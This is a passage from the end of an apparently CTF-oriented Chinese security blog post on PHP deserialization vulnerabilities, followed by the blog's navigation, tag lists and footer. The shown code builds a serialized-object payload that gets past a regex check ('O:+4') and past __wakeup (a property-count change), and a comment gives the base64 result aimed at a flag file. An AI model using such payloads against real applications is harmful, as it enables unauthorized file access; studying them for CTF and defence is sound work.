class="hljs-string">&apos;O:4&apos;</span>, <span class="hljs-string">&apos;O:+4&apos;</span>,<span class="hljs-variable">$s</span>);<span class="hljs-comment">//&#x7ED5;&#x8FC7;&#x6B63;&#x5219;</span></span><br><span class="line"><span class="hljs-variable">$s</span> = str_replace(<span class="hljs-string">&apos;:1:&apos;</span>, <span class="hljs-string">&apos;:2:&apos;</span> ,<span class="hljs-variable">$s</span>);<span class="hljs-comment">//&#x7ED5;&#x8FC7;wakeup&#x51FD;&#x6570;</span></span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-variable">$s</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> base64_encode(<span class="hljs-variable">$s</span>);</span><br><span class="line"><span class="hljs-comment">//TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==</span></span><br></pre></td></tr></tbody></table></figure>
</body></html>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" data-id="ckhvhujmg00320wvtc3nl74vb" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/07/20/%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          源码泄露
        
      </div>
    </a>
  
  
    <a href="/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">PHP命令注入</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CSAPP/">CSAPP</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/Crypto/">Crypto</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/Web/">Web</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Crypto/">Crypto</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Misc/">Misc</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Mysql%E5%BF%85%E7%9F%A5%E5%BF%85%E4%BC%9A/">Mysql必知必会</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/PostgreSql%E5%86%85%E6%A0%B8%E5%88%86%E6%9E%90/">PostgreSql内核分析</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Pwn/">Pwn</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Python/">Python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Redis/">Redis</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Wireshark%E6%95%B0%E6%8D%AE%E5%8C%85%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98/">Wireshark数据包分析实战</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/java%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">java安全研究</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91/">内网</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%92%AA%E5%92%AA/">咪咪</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AF%BC%E8%88%AA%E6%A0%8F/">导航栏</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%BC%83%E7%87%95%E9%9B%80%E4%B9%8B%E5%B0%8F%E5%BF%97-%E6%85%95%E9%B8%BF%E9%B9%84%E4%BB%A5%E9%AB%98%E7%BF%94/">弃燕雀之小志-慕鸿鹄以高翔</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%BC%83%E7%87%95%E9%9B%80%E4%B9%8B%E5%B0%8F%E5%BF%97-%E6%85%95%E9%B8%BF%E9%B9%84%E4%BB%A5%E9%AB%98%E7%BF%94/Web/">Web</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%83%85%E6%84%9F%E7%94%9F%E6%B4%BB/">情感生活</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E5%BF%85%E7%9F%A5%E5%BF%85%E4%BC%9A/">正则表达式必知必会</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AE%97%E6%B3%95/">算法</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%B2%BE%E9%80%9APython%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/">精通Python网络爬虫</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BB%BC%E5%90%88/">综合</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F/">渗透</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/">计算机杂七杂八</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E8%87%AA%E9%A1%B6%E5%90%91%E4%B8%8B/">计算机网络自顶向下</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/">雁儿几度恋开发-愿得一站入万家</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/Android/">Android</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/Qt/">Qt</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/Spring-boot/">Spring boot</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/Vue/">Vue</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%81%E5%84%BF%E5%87%A0%E5%BA%A6%E6%81%8B%E5%BC%80%E5%8F%91-%E6%84%BF%E5%BE%97%E4%B8%80%E7%AB%99%E5%85%A5%E4%B8%87%E5%AE%B6/%E5%BC%80%E5%8F%91%E6%A8%A1%E5%BC%8F/">开发模式</a></li></ul></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/AWD/" rel="tag">AWD</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Android/" rel="tag">Android</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Asuri/" rel="tag">Asuri</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CRC/" rel="tag">CRC</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/DES/" rel="tag">DES</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Docker/" rel="tag">Docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Java/" rel="tag">Java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/KMP/" rel="tag">KMP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Md5/" rel="tag">Md5</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP-Injection/" rel="tag">PHP-Injection</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PostgreSql/" rel="tag">PostgreSql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pwn/" rel="tag">Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Qt/" rel="tag">Qt</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RSA/" rel="tag">RSA</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Redis/" rel="tag">Redis</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Spring-Boot/" rel="tag">Spring Boot</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Sql-Injection/" rel="tag">Sql-Injection</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Upload/" rel="tag">Upload</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Vue/" rel="tag">Vue</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Wireshark/" rel="tag">Wireshark</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/jwt/" rel="tag">jwt</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mysql/" rel="tag">mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python3/" rel="tag">python3</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/" rel="tag">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/webshell/" rel="tag">webshell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A4%9A%E7%BA%BF%E7%A8%8B/" rel="tag">多线程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AD%98%E5%82%A8%E5%99%A8%E5%B1%82%E6%AC%A1%E7%BB%93%E6%9E%84/" rel="tag">存储器层次结构</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" rel="tag">密码学</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AF%BC%E8%88%AA%E6%A0%8F/" rel="tag">导航栏</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BC%80%E5%8F%91%E6%A8%A1%E5%BC%8F/" rel="tag">开发模式</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BC%82%E5%B8%B8%E6%8E%A7%E5%88%B6%E6%B5%81-%E8%BF%9B%E7%A8%8B/" rel="tag">异常控制流&&进程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8D%A2%E6%BA%90/" rel="tag">换源</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" rel="tag">数据结构</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9C%8D%E5%8A%A1%E5%99%A8/" rel="tag">服务器</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%A0%88%E5%B8%A7/" rel="tag">栈帧</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" rel="tag">正则表达式</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B1%87%E7%BC%96/" rel="tag">汇编</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%88%AC%E8%99%AB/" rel="tag">爬虫</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%94%BB%E7%94%BB/" rel="tag">画画</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/" rel="tag">网络安全法</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%99%9A%E6%8B%9F%E5%86%85%E5%AD%98/" rel="tag">虚拟内存</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="tag">计算机网络</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2/" rel="tag">进制转换</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%BF%9B%E7%A8%8B-%E7%BA%BF%E7%A8%8B/" rel="tag">进程&&线程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%93%BE%E6%8E%A5/" rel="tag">链接</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E6%9C%BA%E6%95%B0/" rel="tag">随机数</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%A2%E7%BB%8F/" rel="tag">面经</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%AA%8C%E8%AF%81%E7%A0%81/" rel="tag">验证码</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/AWD/" style="font-size: 10px;">AWD</a> <a href="/tags/Android/" style="font-size: 10px;">Android</a> <a href="/tags/Asuri/" style="font-size: 10px;">Asuri</a> <a href="/tags/CRC/" style="font-size: 10px;">CRC</a> <a href="/tags/CTF/" style="font-size: 18.33px;">CTF</a> <a href="/tags/DES/" style="font-size: 10px;">DES</a> <a href="/tags/Docker/" style="font-size: 10px;">Docker</a> <a href="/tags/Java/" style="font-size: 13.33px;">Java</a> <a href="/tags/KMP/" style="font-size: 10px;">KMP</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/Md5/" style="font-size: 10px;">Md5</a> <a href="/tags/PHP/" style="font-size: 20px;">PHP</a> <a href="/tags/PHP-Injection/" style="font-size: 10px;">PHP-Injection</a> <a href="/tags/PostgreSql/" style="font-size: 10px;">PostgreSql</a> <a href="/tags/Pwn/" style="font-size: 11.67px;">Pwn</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/Qt/" style="font-size: 10px;">Qt</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/Redis/" style="font-size: 10px;">Redis</a> <a href="/tags/Spring-Boot/" style="font-size: 11.67px;">Spring Boot</a> <a href="/tags/Sql-Injection/" style="font-size: 10px;">Sql-Injection</a> <a href="/tags/Upload/" style="font-size: 10px;">Upload</a> <a href="/tags/Vue/" style="font-size: 10px;">Vue</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/Wireshark/" style="font-size: 10px;">Wireshark</a> <a href="/tags/XXE/" style="font-size: 10px;">XXE</a> <a href="/tags/jwt/" style="font-size: 10px;">jwt</a> <a href="/tags/mysql/" style="font-size: 10px;">mysql</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/python3/" style="font-size: 10px;">python3</a> <a href="/tags/sql/" style="font-size: 10px;">sql</a> <a href="/tags/webshell/" style="font-size: 10px;">webshell</a> <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 10px;">反序列化</a> <a href="/tags/%E5%A4%9A%E7%BA%BF%E7%A8%8B/" style="font-size: 10px;">多线程</a> <a href="/tags/%E5%AD%98%E5%82%A8%E5%99%A8%E5%B1%82%E6%AC%A1%E7%BB%93%E6%9E%84/" style="font-size: 10px;">存储器层次结构</a> <a href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" style="font-size: 10px;">密码学</a> <a href="/tags/%E5%AF%BC%E8%88%AA%E6%A0%8F/" style="font-size: 10px;">导航栏</a> <a href="/tags/%E5%BC%80%E5%8F%91%E6%A8%A1%E5%BC%8F/" style="font-size: 10px;">开发模式</a> <a href="/tags/%E5%BC%82%E5%B8%B8%E6%8E%A7%E5%88%B6%E6%B5%81-%E8%BF%9B%E7%A8%8B/" style="font-size: 10px;">异常控制流&&进程</a> <a href="/tags/%E6%8D%A2%E6%BA%90/" style="font-size: 10px;">换源</a> <a href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" style="font-size: 11.67px;">数据结构</a> <a href="/tags/%E6%9C%8D%E5%8A%A1%E5%99%A8/" style="font-size: 10px;">服务器</a> <a href="/tags/%E6%A0%88%E5%B8%A7/" style="font-size: 10px;">栈帧</a> <a href="/tags/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" style="font-size: 10px;">正则表达式</a> <a href="/tags/%E6%B1%87%E7%BC%96/" style="font-size: 10px;">汇编</a> <a href="/tags/%E6%B8%97%E9%80%8F/" style="font-size: 11.67px;">渗透</a> <a href="/tags/%E7%88%AC%E8%99%AB/" style="font-size: 11.67px;">爬虫</a> <a href="/tags/%E7%94%BB%E7%94%BB/" style="font-size: 10px;">画画</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/" style="font-size: 10px;">网络安全法</a> <a href="/tags/%E8%99%9A%E6%8B%9F%E5%86%85%E5%AD%98/" style="font-size: 10px;">虚拟内存</a> <a href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" style="font-size: 16.67px;">计算机网络</a> <a href="/tags/%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2/" style="font-size: 10px;">进制转换</a> <a href="/tags/%E8%BF%9B%E7%A8%8B-%E7%BA%BF%E7%A8%8B/" style="font-size: 10px;">进程&&线程</a> <a href="/tags/%E9%93%BE%E6%8E%A5/" style="font-size: 10px;">链接</a> <a href="/tags/%E9%9A%8F%E6%9C%BA%E6%95%B0/" style="font-size: 10px;">随机数</a> <a href="/tags/%E9%9D%A2%E7%BB%8F/" style="font-size: 10px;">面经</a> <a href="/tags/%E9%AA%8C%E8%AF%81%E7%A0%81/" style="font-size: 10px;">验证码</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/05/">May 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/04/">April 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">December 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2000/02/">February 2000</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/10/04/%E5%BA%9F%E7%89%A9%E5%88%A9%E7%94%A8%E4%B9%8B%E5%88%A9%E7%94%A8%E4%B8%80%E5%8F%B0%E5%BA%9F%E5%BC%83%E7%AC%94%E8%AE%B0%E6%9C%AC%E5%BF%AB%E9%80%9F%E6%90%AD%E5%BB%BACTF%E5%AE%9E%E9%AA%8C%E5%AE%A4%E5%9F%BA%E7%A1%80%E5%BB%BA%E8%AE%BE/">废物利用之利用一台废弃笔记本快速搭建CTF实验室基础建设</a>
          </li>
        
          <li>
            <a href="/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/">JAVA4-改写ysoserial解决常规shell失效问题</a>
          </li>
        
          <li>
            <a href="/2020/05/29/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A83-ysoserial%E8%B0%83%E8%AF%95%E5%92%8C%E6%9E%84%E9%80%A0URLDNS%E7%9A%84pop%E9%93%BE/">JAVA3-ysoserial调试和构造URLDNS的pop链</a>
          </li>
        
          <li>
            <a href="/2020/05/25/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A82-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8CRMI/">JAVA2-反序列化和RMI</a>
          </li>
        
          <li>
            <a href="/2020/05/25/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A8/">JAVA1-反射机制</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 st4ck<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>